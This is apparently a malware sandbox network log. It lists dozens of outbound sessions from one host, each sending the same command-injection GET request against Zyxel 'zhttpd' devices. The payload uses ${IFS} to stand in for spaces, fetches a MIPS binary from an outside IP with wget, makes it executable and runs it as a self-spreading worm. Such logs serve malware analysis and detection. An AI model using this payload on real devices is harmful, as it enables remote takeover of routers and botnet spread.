                                                  Jan 19, 2024 18:24:16.474791050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9472192.168.2.1340028174.137.219.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474827051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9473192.168.2.134190439.172.209.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474877119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9474192.168.2.133905868.65.254.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474920988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9475192.168.2.1346458137.147.60.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474962950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9476192.168.2.136068086.20.181.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474992037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9477192.168.2.135264612.63.28.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475047112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9478192.168.2.1359706102.96.38.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475085974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9479192.168.2.134687091.79.95.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475123882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9480192.168.2.135148287.184.141.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475166082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9481192.168.2.133739017.116.152.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475223064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9482192.168.2.1358956217.119.62.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475250959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9483192.168.2.1334990201.228.152.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475291014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9484192.168.2.1359066213.160.185.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475341082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9485192.168.2.134200860.105.81.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475385904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9486192.168.2.135158653.38.45.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475413084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9487192.168.2.1349454196.186.120.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475461960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9488192.168.2.135585235.51.109.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475512028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9489192.168.2.135256445.232.32.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475560904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9490192.168.2.134025664.38.166.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475588083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9491192.168.2.1345818163.149.181.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475640059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9492192.168.2.1350912142.134.160.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475689888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9493192.168.2.1338862195.206.192.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475717068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9494192.168.2.1347214146.135.139.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475754976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9495192.168.2.1340850147.241.29.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475801945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9496192.168.2.1335970124.130.208.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475837946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9497192.168.2.135636675.96.68.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475879908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9498192.168.2.1345310118.145.130.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475908995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9499192.168.2.1345416217.87.254.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.475965977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9500192.168.2.1339292107.221.125.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476010084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9501192.168.2.1341372186.83.207.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476039886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9502192.168.2.1341278107.34.32.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476073980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9503192.168.2.1357160159.240.23.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476125002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9504192.168.2.135371840.146.117.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476172924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9505192.168.2.133737649.106.63.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476226091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9506192.168.2.136025891.79.8.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476253986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9507192.168.2.135317685.89.53.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476310015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9508192.168.2.133422674.252.173.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476340055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9509192.168.2.1352588166.137.21.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476377010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9510192.168.2.1349732194.234.187.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476430893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9511192.168.2.1358262164.251.134.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476473093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9512192.168.2.1348174194.23.218.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476520061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9513192.168.2.134800297.63.214.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476560116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9514192.168.2.1335668101.107.102.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476584911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9515192.168.2.13339622.252.154.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476639032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9516192.168.2.1340278115.106.17.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476660013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9517192.168.2.1337152206.25.85.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476707935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9518192.168.2.1346646117.192.148.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476758003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9519192.168.2.135589690.99.214.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476797104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9520192.168.2.1347828186.189.178.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476847887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9521192.168.2.1348664126.63.241.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476881981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9522192.168.2.1339252119.175.53.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476907969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9523192.168.2.1342866187.226.140.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.476946115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9524192.168.2.1352248161.192.75.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477006912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9525192.168.2.135802079.124.244.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477049112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9526192.168.2.135499435.178.192.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477082014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9527192.168.2.134879060.232.105.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477137089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9528192.168.2.1338346111.97.188.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477173090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9529192.168.2.1344420203.143.121.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477210045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9530192.168.2.1357896188.255.91.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477245092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9531192.168.2.1350868180.90.69.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477284908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9532192.168.2.133922232.14.129.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477335930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9533192.168.2.135535493.146.100.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.477355957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9534192.168.2.1351846168.33.194.202443
                                                  TimestampBytes transferredDirectionData
